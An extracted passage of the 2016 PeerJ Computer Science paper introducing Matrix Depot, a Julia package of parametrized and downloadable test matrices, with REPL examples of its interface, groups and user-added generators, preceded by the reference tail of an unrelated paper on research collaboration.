Stanley HE, Pammolli F. 2012. Persistence and uncertainty in the academic career. Proceedings of the National Academy of Sciences of the United States of America 109(14):5213–5218 DOI 10.1073/pnas.1121429109. Uddin S, Hossain L, Rasmussen K. 2013. Network effects on scientific collaborations. PLoS ONE 8(2):e57546 DOI 10.1371/journal.pone.0057546. Wagner CS, Leydesdorff L. 2005. Network structure, self-organization, and the growth of international collaboration in science. Research Policy 34(10):1608–1618 DOI 10.1016/j.respol.2005.08.002. Wuchty S, Jones BF, Uzzi B. 2007. The increasing dominance of teams in production of knowledge. Science 316(5827):1036–1039 DOI 10.1126/science.1136099. Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 21/21 https://peerj.com/computer-science/ http://dx.doi.org/10.1073/pnas.0610245104 http://dx.doi.org/10.1108/OIR-07-2014-0169 http://dx.doi.org/10.1209/0295-5075/97/18007 http://dx.doi.org/10.1073/pnas.1121429109 http://dx.doi.org/10.1371/journal.pone.0057546 http://dx.doi.org/10.1016/j.respol.2005.08.002 http://dx.doi.org/10.1126/science.1136099 http://dx.doi.org/10.7717/peerj-cs.41 Research collaboration and topic trends in Computer Science based on top active authors Introduction Related Work Materials & Methods Results Comparing top active authors and average authors Collaboration among top active authors Topic trend based on top active author collaboration Discussion Conclusion References work_mtxmsl6sa5d5zbxq2cv3ih2k6m ---- The University of Manchester Research Matrix Depot: an extensible test matrix collection for Julia DOI: 10.7717/peerj-cs.58 Document Version Final published version Link to publication record in Manchester Research Explorer Citation for published version (APA): Zhang, W., & Higham, N. (Accepted/In press). Matrix Depot: an extensible test matrix collection for Julia. PeerJ, 2(e58), 1-25. https://doi.org/10.7717/peerj-cs.58 Published in: PeerJ Citing this paper Please note that where the full-text provided on Manchester Research Explorer is the Author Accepted Manuscript or Proof version this may differ from the final Published version. If citing, it is advised that you check and use the publisher's definitive version. General rights Copyright and moral rights for the publications made accessible in the Research Explorer are retained by the authors and/or other copyright owners and it is a condition of accessing publications that users recognise and abide by the legal requirements associated with these rights. Takedown policy If you believe that this document breaches copyright please refer to the University of Manchester’s Takedown Procedures [http://man.ac.uk/04Y6Bo] or contact uml.scholarlycommunications@manchester.ac.uk providing relevant details, so we can investigate your claim. Download date:06. Apr. 2021 https://doi.org/10.7717/peerj-cs.58 https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia(7b87af3d-1828-415b-8b50-be918548ac52).html /portal/nick.higham.html https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia(7b87af3d-1828-415b-8b50-be918548ac52).html https://doi.org/10.7717/peerj-cs.58 Submitted 21 December 2015 Accepted 18 March 2016 Published 6 April 2016 Corresponding author Nicholas J. Higham, nick.higham@manchester.ac.uk Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.58 Copyright 2016 Zhang and Higham Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Matrix Depot: an extensible test matrix collection for Julia Weijian Zhang and Nicholas J. Higham School of Mathematics, University of Manchester, Manchester, UK ABSTRACT Matrix Depot is a Julia software package that provides easy access to a large and diverse collection of test matrices. Its novelty is threefold. First, it is extensible by the user, and so can be adapted to include the user’s own test problems. In doing so, it facilitates experimentation and makes it easier to carry out reproducible research. Second, it amalgamates in a single framework two different types of existing matrix collections, comprising parametrized test matrices (including Hansen’s set of regularization test problems and Higham’s Test Matrix Toolbox) and real-life sparse matrix data (giving access to the University of Florida sparse matrix collection). Third, it fully exploits the Julia language. It uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. Subjects Algorithms and Analysis of Algorithms, Data Science, Scientific Computing and Simulation Keywords Julia, Software package, Test matrices, Matrix algorithm., Test problems INTRODUCTION In 1969, Gregory and Karney published a book of test matrices (Gregory & Karney, 1969). They stated that ‘‘In order to test the accuracy of computer programs for solving numerical problems, one needs numerical examples with known solutions. The aim of this monograph is to provide the reader with suitable examples for testing algorithms for finding the inverses, eigenvalues, and eigenvectors of matrix.’’ At that time it was common for journal papers to be devoted to introducing and analyzing a particular test matrix or class of matrices, examples being the papers of Clement (1959) (in the first issue of SIAM Review), Pei (1962) (occupying just a quarter of a page), and Gear (1969). Today, test matrices remain of great interest, but not for the same reasons as fifty years ago. Testing accuracy using problems with known solutions is less common because a reference solution correct to machine precision can usually be computed at higher precision without difficulty. The main uses of test matrices nowadays are for exploring the behavior of mathematical quantities (such as eigenvalue bounds) and for measuring the performance of one or more algorithms with respect to accuracy, stability, convergence rate, speed, or robustness. Various collections of matrices have been made available in software. As well as giving easy access to matrices these collections have the advantage of facilitating reproducibility of experiments (Donoho & Stodden, 2015), whether by the same researcher months later or by different researchers. How to cite this article Zhang and Higham (2016), Matrix Depot: an extensible test matrix collection for Julia. PeerJ Comput. Sci. 2:e58; DOI 10.7717/peerj-cs.58 https://peerj.com mailto:nick.higham@manchester.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.58 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.58 1The University of Florida Sparse Matrix Collection is to be renamed as The SuiteSparse Matrix Collection. An early collection of parametrizable matrices was given by Higham (1991) and made available in MATLAB form. The collection was later extended and distributed as a MATLAB toolbox (Higham, 1995). Many of the matrices in the toolbox were subsequently incorporated into the MATLAB gallery function. Marques, Vömel, Demmel, and Parlett (Marques et al., 2008) present test matrices for tridiagonal eigenvalue problems (already recognized as important by Gregory and Karney, who devoted the last chapter of their book to such matrices). The Harwell–Boeing collection of sparse matrices (Duff, Grimes & Lewis, 1989) has been widely used, and is incorporated in the University of Florida Sparse Matrix Collection1 (Davis & Hu, 2011), which contains over 2700 matrices from practical applications, including standard and generalized eigenvalue problems from Bai et al. (1997). Among other MATLAB toolboxes we mention the CONTEST toolbox (Taylor & Higham, 2009), which produces adjacency matrices describing random networks, and the NLEVP collection of nonlinear eigenvalue problems (Betcke et al., 2013). The purpose of this work is to provide a test matrix collection for Julia (Bezanson et al., 2014; Bezanson et al., 2012), a new dynamic programming language for technical computing. The collection, called Matrix Depot, exploits Julia’s multiple dispatch features to enable all matrices to be accessed by one simple interface. Moreover, Matrix Depot is extensible. Users can add matrices from the University of Florida Sparse Matrix Collection and Matrix Market; they can code new matrix generators and incorporate them into Matrix Depot; and they can define new groups of matrices that give easy access to subsets of matrices. The parametrized matrices can be generated in any appropriate numeric data type, such as • floating-point types Float16 (half precision: 16 bits), Float32 (single precision: 32 bits), and Float64 (double precision: 64 bits); • integer types Int32 (signed 32-bit integers), UInt32 (unsigned 32-bit integers), Int64 (signed 64-bit integers), and UInt64 (unsigned 64-bit integers); • Complex, where the real and imaginary parts are of any Real type (the same for both); • Rational (ratio of integers); and • arbitrary precision type BigFloat (with default precision 256 bits), which uses the GNU MPFR Library (Fousse et al., 2007). This paper is organized as follows. We start by giving a brief demonstration of Matrix Depot in ‘A Taste of Matrix Depot.’ Then we explain the design and implementation of Matrix Depot in ‘Package Design and Implementation,’ giving details on how multiple dispatch is exploited; how the collection is stored, accessed, and documented; and how it can be extended. In ‘The Matrices’ we describe the two classes of matrices in Matrix Depot: parametrized test matrices and real-life sparse matrix data. Concluding remarks are given in the final section. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 2/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 A TASTE OF MATRIX DEPOT To download Matrix Depot, in a Julia REPL (read-eval-print loop) run the command > Pkg.add("MatrixDepot") Then import Matrix Depot into the local scope. > using MatrixDepot Now the package is ready to be used. First, we find out what matrices are in Matrix Depot. > matrixdepot() Matrices: 1) baart 2) binomial 3) blur 4) cauchy 5) chebspec 6) chow 7) circul 8) clement 9) companion 10) deriv2 11) dingdong 12) fiedler 13) forsythe 14) foxgood 15) frank 16) golub 17) gravity 18) grcar 19) hadamard 20) hankel 21) heat 22) hilb 23) invhilb 24) invol 25) kahan 26) kms 27) lehmer 28) lotkin 29) magic 30) minij 31) moler 32) neumann 33) oscillate 34) parallax 35) parter 36) pascal 37) pei 38) phillips 39) poisson 40) prolate 41) randcorr 42) rando 43) randsvd 44) rohess 45) rosser 46) sampling 47) shaw 48) spikes 49) toeplitz 50) tridiag 51) triw 52) ursell 53) vand 54) wathen 55) wilkinson 56) wing Groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric All the matrices and groups in the collection are shown. It is also possible to obtain just the list of matrix names. > matrixdepot("all") 56-element Array{ASCIIString,1}: "baart" "binomial" "blur" "cauchy" "chebspec" "chow" "circul" "clement" "companion" "deriv2" ... "spikes" "toeplitz" "tridiag" "triw" "ursell" "vand" "wathen" Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 3/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 "wilkinson" "wing" Here, ‘‘ ...’’ denotes that we have omitted some of the output in order to save space. Next, we check the input options of the Hilbert matrix hilb. > matrixdepot("hilb") Hilbert matrix ================ The Hilbert matrix has (i,j) element 1/(i+j-1). It is notorious for being ill conditioned. It is symmetric positive definite and totally positive. Input options: * [type,] dim: the dimension of the matrix. * [type,] row_dim, col_dim: the row and column dimensions. Groups: ["inverse", "ill-cond", "symmetric", "pos-def"] References: M. D. Choi, Tricks or treats with the Hilbert matrix, Amer. Math. Monthly, 90 (1983), pp. 301-312. N. J. Higham, Accuracy and Stability of Numerical Algorithms, second edition, Society for Industrial and Applied Mathematics, Philadelphia, PA, USA, 2002; sec. 28.1. Note that an optional first argument type can be given; it defaults to Float64. The string of equals signs on the third line in the output above is Markdown notation for a header. Julia interprets Markdown within documentation, though as we are using typewriter font for code examples here, we display the uninterpreted source. We generate a 4×6 Hilbert matrix with elements in the default double precision type and then in Rational type. > matrixdepot("hilb", 4, 6) 4x6 Array{Float64,2}: 1.0 0.5 0.333333 0.25 0.2 0.166667 0.5 0.333333 0.25 0.2 0.166667 0.142857 0.333333 0.25 0.2 0.166667 0.142857 0.125 0.25 0.2 0.166667 0.142857 0.125 0.111111 > matrixdepot("hilb", Rational, 4, 6) 4x6 Array{Rational{T<:Integer},2}: 1//1 1//2 1//3 1//4 1//5 1//6 1//2 1//3 1//4 1//5 1//6 1//7 1//3 1//4 1//5 1//6 1//7 1//8 1//4 1//5 1//6 1//7 1//8 1//9 A list of all the symmetric matrices in the collection is readily obtained. > matrixdepot("symmetric") 21-element Array{ASCIIString,1}: "cauchy" Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 4/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 "circul" "clement" "dingdong" "fiedler" "hankel" "hilb" "invhilb" "kms" "lehmer" "minij" "moler" "oscillate" "pascal" "pei" "poisson" "prolate" "randcorr" "tridiag" "wathen" "wilkinson" Here, symmetric is one of several predefined groups, and multiple groups can be intersected. For example, the for loop below prints the smallest and largest eigenvalues of all the 4×4 matrices in Matrix Depot that are symmetric positive definite and (potentially) ill conditioned. > for name in matrixdepot("symmetric", "pos-def", "ill-cond") A = full(matrixdepot(name, 4)) @printf " name eigmin(A) eigmax(A) end cauchy: smallest eigval = 2.131e-05, largest eigval = 9.776e-01 hilb: smallest eigval = 9.670e-05, largest eigval = 1.500e+00 invhilb: smallest eigval = 6.666e-01, largest eigval = 1.034e+04 kms: smallest eigval = 3.750e-01, largest eigval = 2.086e+00 moler: smallest eigval = 3.336e-02, largest eigval = 5.122e+00 oscillate: smallest eigval = 1.490e-08, largest eigval = 1.000e+00 pascal: smallest eigval = 3.802e-02, largest eigval = 2.630e+01 pei: smallest eigval = 1.000e+00, largest eigval = 5.000e+00 tridiag: smallest eigval = 3.820e-01, largest eigval = 3.618e+00 Matrices can also be accessed by number within the alphabetical list of matrix names. > matrixdepot(2) "binomial" > matrixdepot(2:5) 4-element Array{AbstractString,1}: "binomial" "blur" "cauchy" "chebspec" > matrixdepot(15:20, 5, 6, 1:3) 11-element Array{AbstractString,1}: "frank" "golub" "gravity" "grcar" Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 5/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 "hadamard" "hankel" "chebspec" "chow" "baart" "binomial" "blur" Access by number provides a convenient way to run a test on subsets of matrices in the collection. However, the number assigned to a matrix may change if we include new matrices in the collection. In order to run tests in a way that is repeatable in the future it is best to group matrices into subsets using the macro @addgroup, which stores them by name. For example, the following command will group test matrices frank, golub, gravity, grcar, hadamard, hankel, chebspec, chow, baart, binomial, and blur into test1. > @addgroup test1 = matrixdepot(15:20, 5, 6, 1:3) After reloading the package, we can run tests on these matrices using group test1. Here we compute the 2-norms. Since blur (an image deblurring test problem) generates a sparse matrix and the matrix 2-norm is currently not implemented for sparse matrices in Julia, we use full to convert the matrix to dense format. > for name in matrixdepot("test1") A = full(matrixdepot(name , 4)) @printf "\%9s has 2-norm \%0.3e \n" name norm(A) end baart has 2-norm 3.192e+00 binomial has 2-norm 4.576e+00 blur has 2-norm 8.298e-01 chebspec has 2-norm 6.474e+00 chow has 2-norm 3.414e+00 frank has 2-norm 7.624e+00 golub has 2-norm 2.050e+02 gravity has 2-norm 6.656e+00 grcar has 2-norm 2.562e+00 hadamard has 2-norm 2.000e+00 hankel has 2-norm 1.160e+01 To download the test matrix SNAP/web-Google from the University of Florida Sparse Matrix Collection (see ‘Matrix Data from External Sources’ for more details), we first download the data with > matrixdepot("SNAP/web-Google", :get) and then generate the matrix with > matrixdepot("SNAP/web-Google", :r) 916428x916428 sparse matrix with 5105039 Float64 entries: [11343 , 1] = 1.0 [11928 , 1] = 1.0 [15902 , 1] = 1.0 [29547 , 1] = 1.0 Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 6/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 [30282 , 1] = 1.0 [31301 , 1] = 1.0 [38717 , 1] = 1.0 ... [720325, 916427] = 1.0 [772226, 916427] = 1.0 [785097, 916427] = 1.0 [788476, 916427] = 1.0 [822938, 916427] = 1.0 [833616, 916427] = 1.0 [417498, 916428] = 1.0 [843845, 916428] = 1.0 Note that the omission marked ‘‘ ...’’ was in this case automatically done by Julia based on the height of the terminal window. Matrices loaded in this way are inserted into the list of available matrices, and assigned a number. After downloading further matrices HB/1138_bus, HB/494_bus, and Bova/rma10 the list of matrices is as follows. julia> matrixdepot() Matrices: 1) baart 2) binomial 3) blur 4) cauchy 5) chebspec 6) chow 7) circul 8) clement 9) companion 10) deriv2 11) dingdong 12) fiedler 13) forsythe 14) foxgood 15) frank 16) golub 17) gravity 18) grcar 19) hadamard 20) hankel 21) heat 22) hilb 23) invhilb 24) invol 25) kahan 26) kms 27) lehmer 28) lotkin 29) magic 30) minij 31) moler 32) neumann 33) oscillate 34) parallax 35) parter 36) pascal 37) pei 38) phillips 39) poisson 40) prolate 41) randcorr 42) rando 43) randsvd 44) rohess 45) rosser 46) sampling 47) shaw 48) spikes 49) toeplitz 50) tridiag 51) triw 52) ursell 53) vand 54) wathen 55) wilkinson 56) wing 57) Bova/rma10 58) HB/1138_bus 59) HB/494_bus 60) SNAP/web-Google Groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric test1 PACKAGE DESIGN AND IMPLEMENTATION In this section we describe the design and implementation of Matrix Depot, focusing particularly on the novel aspects of exploitation of multiple dispatch, extensibility of the collection, and user-definable grouping of matrices. Exploiting multiple dispatch Matrix Depot makes use of multiple dispatch in Julia, an object-oriented paradigm in which the selection of a function implementation is based on the types of each argument of the function. The generic function matrixdepot has eight different methods, where each method itself is a function that handles a specific case. This is neater and more convenient than writing eight ‘‘case’’ statements, as is necessary in many other languages. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 7/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 > methods(matrixdepot) # 8 methods for generic function "matrixdepot": matrixdepot() ... matrixdepot(name::AbstractString) ... matrixdepot(name::AbstractString, method::Symbol) ... matrixdepot(props::AbstractString...) ... matrixdepot(name::AbstractString, args...) ... matrixdepot(num::Integer) ... matrixdepot(ur::UnitRange{T<:Real}) ... matrixdepot(vs::Union{Integer,UnitRange{T<:Real}}...) ... For example, the following two functions are used for accessing matrices by number and range respectively, where matrix_name_list() returns a list of matrix names. The second function calls the first function in the inner loop. function matrixdepot(num::Integer) matrixstrings = matrix_name_list() n = length(matrixstrings) if num > n error("There are $(n) parameterized matrices, but you asked for the $(num)-th.") end return matrixstrings[num] end function matrixdepot(ur::UnitRange) matrixnamelist = AbstractString[] for i in ur push!(matrixnamelist, matrixdepot(i)) end return matrixnamelist end As a result, matrixdepot is a versatile function that can be used for a variety of purposes, including returning matrix information and generating matrices from various input parameters. In the following example we see how multiple dispatch handles different numbers and types of arguments for the Cauchy matrix. > matrixdepot("cauchy") Cauchy matrix ============= Given two vectors x and y, the (i,j) entry of the Cauchy matrix is 1/(x[i]+y[j]). Input options: * [type,] x, y: two vectors. * [type,] x: a vector. y defaults to x. * [type,] dim: the dimension of the matrix. x and y default to [1:dim;]. Groups: ["inverse", "ill-cond", "symmetric", "pos-def"] Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 8/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 References: N. J. Higham, Accuracy and Stability of Numerical Algorithms, second edition, Society for Industrial and Applied Mathematics, Philadelphia, PA, USA, 2002; sec. 28.1 > matrixdepot("cauchy", [1, 2, 3], [4, 5, 6]) 3x3 Array{Float64,2}: 0.2 0.166667 0.142857 0.166667 0.142857 0.125 0.142857 0.125 0.111111 > matrixdepot("cauchy", [0.2, 0.3, 0.4]) 3x3 Array{Float64,2}: 2.5 2.0 1.66667 2.0 1.66667 1.42857 1.66667 1.42857 1.25 > matrixdepot("cauchy", 3) 3x3 Array{Float64,2}: 0.5 0.333333 0.25 0.333333 0.25 0.2 0.25 0.2 0.166667 > matrixdepot("cauchy", Float32, 3) 3x3 Array{Float32,2}: 0.5 0.333333 0.25 0.333333 0.25 0.2 0.25 0.2 0.166667 Multiple dispatch is also exploited in programming the matrices. For example, the Hilbert matrix is implemented as function hilb{T}(::Type{T}, m::Integer, n::Integer) H = zeros(T, m, n) for j = 1:n, i = 1:m @inbounds H[i,j] = one(T)/ (i + j - one(T)) end return H end hilb{T}(::Type{T}, n::Integer) = hilb(T, n, n) hilb(args...) = hilb(Float64, args...) The function hilb has three methods, which enable one to request, for example, hilb(4,2) for a 4×2 Hilbert matrix of type Float64, or simply (thanks to the final two lines) hilb(4) for a 4×4 Hilbert matrix of type Float64. The keyword @inbounds tells Julia to turn off bounds checking in the following expression, in order to speed up execution. Note that in Julia it is not necessary to vectorize code to achieve good performance (Bezanson et al., 2014). All the matrices in Matrix Depot can be generated using the function call matrixdepot("matrix_name", p1, p2, ...), where matrix_name is the name of the test matrix, and p1, p2, ..., are input arguments depending on matrix_name. The help comments for each matrix can be viewed by Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 9/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 calling function matrixdepot("matrix_name"). We can access the list of matrix names by number, range, or a mixture of numbers and range. 1. matrixdepot(i)returns the name of the ith matrix; 2. matrixdepot(i:j)returns the names of the ith to jth matrices, where i < j; 3. matrixdepot(i:j, k, m)returns the names of the ith, (i+1)st, ..., jth, kth, and mth matrices. Matrix representation Matrix names in Matrix Depot are represented by Julia strings. For example, the Cauchy matrix is represented by "cauchy". Matrix names and matrix groups are stored as hash tables (Dict). In particular, there is a hash table matrixdict that maps each matrix name to its underlying function and a hash table matrixclass that maps each group to its members. The majority of parametrized matrices are dense matrices of type Array{T,2}, where T is the element type of the matrix. Variables of the Array type are stored in column-major order. A few matrices are stored as sparse matrices (see also matrixdepot("sparse")), in the Compressed Sparse Column (CSC) format; these include neumann (a singular matrix from the discrete Neumann problem) and poisson (a block tridiagonal matrix from Poisson’s equation). Tridiagonal matrices are stored in the built-in Julia type Tridiagonal, which is defined as follows. immutable Tridiagonal{T} <: AbstractMatrix{T} dl::Vector{T} # sub-diagonal d::Vector{T} # diagonal du::Vector{T} # sup-diagonal du2::Vector{T} # supsup-diagonal for pivoting end Matrix groups A group is a subset of matrices in Matrix Depot. There are ten predefined groups, described in Table 1, most of which identify matrices with particular properties. Each group is represented by a string. For example, the group of random matrices is represented by "random". Matrices can be accessed by group names, as was illustrated in ‘A Taste of Matrix Depot.’ The macro @addgroup is used to add a new group of matrices to Matrix Depot and the macro @rmgroup removes an added group. All the predefined matrix groups are stored in the hash table matrixclass. The macro addgroup essentially adds a new key-value combination to the hash table usermatrixclass. Using a separate hash table prevents the user from contaminating the predefined matrix groups. Being able to create groups is a useful feature for reproducible research (Donoho & Stodden, 2015). For example, if we have implemented algorithm alg01 and we used circul, minij, and grcar as test matrices for alg01, we could type > @addgroup alg01_group = ["circul", "minij", "grcar"] Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 10/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 Table 1 Predefined groups. Group Description all All the matrices in the collection. data The matrix has been downloaded from the University of Florida Sparse Collection or the Matrix Market Collection. eigen Part of the eigensystem of the matrix is explicitly known. ill-cond The matrix is ill-conditioned for some parameter values. inverse The inverse of the matrix is known explicitly. pos-def The matrix is positive definite for some parameter values. random The matrix has random entries. regprob The output is a test problem for regularization methods. sparse The matrix is sparse. symmetric The matrix is symmetric for some parameter values. This adds a new group to Matrix Depot (we need to reload the package to see the changes). julia> matrixdepot() Matrices: 1) baart 2) binomial 3) blur 4) cauchy 5) chebspec 6) chow 7) circul 8) clement 9) companion 10) deriv2 11) dingdong 12) fiedler 13) forsythe 14) foxgood 15) frank 16) golub 17) gravity 18) grcar 19) hadamard 20) hankel 21) heat 22) hilb 23) invhilb 24) invol 25) kahan 26) kms 27) lehmer 28) lotkin 29) magic 30) minij 31) moler 32) neumann 33) oscillate 34) parallax 35) parter 36) pascal 37) pei 38) phillips 39) poisson 40) prolate 41) randcorr 42) rando 43) randsvd 44) rohess 45) rosser 46) sampling 47) shaw 48) spikes 49) toeplitz 50) tridiag 51) triw 52) ursell 53) vand 54) wathen 55) wilkinson 56) wing Groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric alg01_group We can then run alg01 on the test matrices by > for name in matrixdepot(alg01_group) A = matrixdepot(name, n) # n is the dimension of the matrix. @printf "Test result for end Adding new matrix generators Generators are Julia functions that generate test matrices. When Matrix Depot is first loaded, a directory myMatrixDepot is created. It contains two files, group.jl and generator.jl, where group.jl is used for storing all the user-defined groups (see ‘Matrix Group’) and generator.jl is used for storing generator declarations. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 11/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 2Git is a free and open source distributed version control system. Julia packages are simply Git repositories.2 The directory myMatrixDepot is untracked by Git, so any local changes to files in myMatrixDepot do not make the MatrixDepot package ‘‘dirty.’’ In particular, all the newly defined groups or matrix generators will not be affected when we upgrade to a new version of Matrix Depot. Matrix Depot automatically loads all Julia files in myMatrixDepot. This feature allows a user to simply drop generator files into myMatrixDepot without worrying about how to link them to Matrix Depot. Anewgeneratorisdeclaredusingthesyntaxinclude_generator(FunctionName, "fname", f). This adds the new mapping "fname" → f to the hash table matrixdict, which we recall maps each matrix name to its underlying function. Matrix Depot will refer to function f using string "fname" so that we can call function f by matrixdepot("fname"...). The user is free to define new data types and return values of those types. Moreover, as with any Julia function, multiple values can be returned by listing them after the return statement. For example, suppose we have the following Julia file rand.jl, which contains two generators randsym and randorth and we want to use them from Matrix Depot. The triple quotes in the file delimit the documentation for the functions. """ random symmetric matrix ======================= Input options: * n: the dimension of the matrix """ function randsym(n) A = zeros(n, n) for j = 1:n for i = 1:j A[i,j] = randn() if i != j; A[j,i] = A[i,j] end end end return A end """ random orthogonal matrix ======================== Input options: * n: the dimension of the matrix """ randorth(n) = qr(randn(n,n))[1] We can copy the file rand.jl to the directory myMatrixDepot and add the following two lines to generator.jl. include_generator(FunctionName, "randsym", randsym) include_generator(FunctionName, "randorth", randorth) Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 12/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 This includes the functions randsym and randorth in Matrix Depot, as we can see by looking at the matrix list (the new entries are numbered 43 and 45). julia> matrixdepot() Matrices: 1) baart 2) binomial 3) blur 4) cauchy 5) chebspec 6) chow 7) circul 8) clement 9) companion 10) deriv2 11) dingdong 12) fiedler 13) forsythe 14) foxgood 15) frank 16) golub 17) gravity 18) grcar 19) hadamard 20) hankel 21) heat 22) hilb 23) invhilb 24) invol 25) kahan 26) kms 27) lehmer 28) lotkin 29) magic 30) minij 31) moler 32) neumann 33) oscillate 34) parallax 35) parter 36) pascal 37) pei 38) phillips 39) poisson 40) prolate 41) randcorr 42) rando 43) randorth 44) randsvd 45) randsym 46) rohess 47) rosser 48) sampling 49) shaw 50) spikes 51) toeplitz 52) tridiag 53) triw 54) ursell 55) vand 56) wathen 57) wilkinson 58) wing Groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric The new generators can be used just like the built-in ones. > matrixdepot("randsym") random symmetric matrix ======================= Input options: * n: the dimension of the matrix > matrixdepot("randsym", 4) 4x4 Array{Float64,2}: -0.00992523 0.174531 -1.73322 -0.765096 0.174531 1.69308 0.269062 0.594058 -1.73322 0.269062 -0.824277 -0.541458 -0.765096 0.594058 -0.541458 -0.480428 > matrixdepot("randorth") random orthogonal matrix ======================== Input options: * n: the dimension of the matrix > A = matrixdepot("randorth", 4) 4x4 Array{Float64,2}: -0.233943 0.179893 0.563926 -0.771295 -0.769649 -0.141938 -0.5807 -0.224235 0.247165 0.832118 -0.449941 -0.20986 -0.540204 0.505046 0.377263 0.557477 > A’*A - eye(4,4) 4x4 Array{Float64,2}: -2.22045e-16 1.66533e-16 -2.77556e-17 -1.66533e-16 Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 13/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 1.66533e-16 -1.11022e-16 -3.05311e-16 1.66533e-16 -2.77556e-17 -3.05311e-16 -1.11022e-16 1.94289e-16 -1.66533e-16 1.66533e-16 1.94289e-16 0.0 We can also add group information with the function include_generator. The following lines are put in generator.jl. include_generator(Group, "random", randsym) include_generator(Group, "random", randorth) This adds the functions randsym and randorth to the group random, as we can see with the following query (after reloading the package). > matrixdepot("random") 10-element Array{ASCIIString,1}: "golub" "oscillate" "randcorr" "rando" "randorth" "randsvd" "randsym" "rohess" "rosser" "wathen" Documentation The Matrix Depot documentation is created using the documentation generator Sphinx (http://sphinx-doc.org/) and is hosted at Read the Docs (http://matrixdepotjl.readthedocs. org). Its primary goals are to provide examples of usage of Matrix Depot and to give a brief summary of each matrix in the collection. Matrices are listed alphabetically with hyperlinks to the documentation for each matrix. Most parametrized matrices are presented with heat map plots, which are produced using the Winston package (https://github.com/nolta/Winston.jl), with the color range determined by the smallest and largest entries of the matrix. For example, Fig. 1 shows how the Wathen matrix is documented in Matrix Depot. THE MATRICES We now describe the matrices that are provided with, or can be downloaded into, Matrix Depot. Parametrized matrices In Matrix Depot v0.5.5, there are 58 parametrized matrices (including the regu- larization problems described in the next section), most of which originate from the Test Matrix Toolbox (Higham, 1995). All these matrices can be generated as matrixdepot("matrix_name", n), where n is the dimension of the matrix. Many matrices can have more than one input parameter, and multiple dispatch provides a convenient mechanism for taking different actions for different argument types. For Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 14/25 https://peerj.com http://sphinx-doc.org/ http://matrixdepotjl.readthedocs.org http://matrixdepotjl.readthedocs.org https://github.com/nolta/Winston.jl http://dx.doi.org/10.7717/peerj-cs.58 Figure 1 Documentation for the Wathen matrix. example, the tridiag function generates a tridiagonal matrix from vector arguments giving the subdiagonal, diagonal, and superdiagonal vectors, but a tridiagonal Toeplitz matrix can be obtained by supplying scalar arguments that specify the dimension of the matrix, the subdiagonal, the diagonal, and the superdiagonal. If a single, scalar argument n is supplied then an n-by- n tridiagonal Toeplitz matrix with subdiagonal and superdiagonal −1 and diagonal 2 is constructed. This matrix arises in applying central differences to a second derivative operator, and the inverse and the condition number are known explicitly (Higham, 2002, sec. 28.5). Here is an example of the different usages of tridiag. > matrixdepot("tridiag") Tridiagonal Matrix ==================== Construct a tridiagonal matrix of type Tridiagonal. Zhang and Higham (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.58 15/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.58 Input options: * [type,] v1, v2, v3: v1 and v3 are vectors of subdiagonal and superdiagonal elements, respectively, and v2 is a vector of diagonal elements. * [type,] dim, x, y, z: dim is the dimension of the matrix, x, y, z are scalars. x and z are the subdiagonal and superdiagonal elements, respectively, and y is the diagonal elements. * [type,] dim: x = -1, y = 2, z = -1. This matrix is also known as the second difference matrix. Groups: ["inverse", "ill-cond", "pos-def", "eigen"] References: J. Todd, Basic Numerical Mathematics, Vol. 2: Numerical Algebra, Birkhauser, Basel, and Academic Press, New York, 1977, p. 155. > matrixdepot("tridiag", [2,5,6;], ones(4), [3,4,1;]) 4x4 Tridiagonal{Float64}: 1.0 3.0 0.0 0.0 2.0 1.0 4.0 0.0 0.0 5.0 1.0 1.0 0.0 0.0 6.0 1.0 > matrixdepot("tridiag", 4, 5, 3, 1) 4x4 Tridiagonal{Float64}: 3.0 1.0 0.0 0.0 5.0 3.0 1.0 0.0 0.0 5.0 3.0 1.0 0.0 0.0 5.0 